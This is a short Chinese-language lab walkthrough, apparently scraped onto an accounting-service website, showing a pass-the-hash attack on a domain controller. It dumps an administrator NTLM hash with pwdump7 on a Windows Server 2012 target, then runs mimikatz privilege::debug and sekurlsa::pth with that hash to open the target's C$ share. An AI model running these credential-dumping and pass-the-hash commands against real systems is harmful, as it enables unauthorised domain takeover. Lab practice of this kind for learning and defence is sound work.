您好,欢迎访问代理记账网站
移动应用 微信公众号 联系我们

咨询热线 -

电话 15988168888

联系客服
  • 价格透明
  • 信息保密
  • 进度掌控
  • 售后无忧

使用mimikatz利用哈希传递获取域控权限

使用mimikatz利用哈希传递获取域控权限

靶机 window server 2012 IP 192.168.1.22
攻击机 window7 IP 192.168.1.34
(1)win2012 server获取目标hash对应用户名administrator,500,获取目标的NTLM哈希值可以使用mimikatz或者pwdump7
使用pwdump7,执行命令Pwdump7.exe
在这里插入图片描述

导出信息到1.txt中
在这里插入图片描述

复制出ntlm

CE28B42F9943D0552385BC5F6338F9B9

(2)在攻击机上管理员权限打开mimikatz
找到mimikatz对应的位置,执行命令mimikatz.exe
在这里插入图片描述

提权执行privilege::debug
在这里插入图片描述

再执行sekurlsa::pth /user:administrator /domain:demo.com /ntlm:CE28B42F9943D0552385BC5F6338F9B9
成功打开另外一个cmd
在这里插入图片描述

在新的cmd命令行中输入dir \\192.168.1.22\c$即可查看目标机器内容
在这里插入图片描述


分享:

低价透明

统一报价,无隐形消费

金牌服务

一对一专属顾问7*24小时金牌服务

信息保密

个人信息安全有保障

售后无忧

服务出问题客服经理全程跟进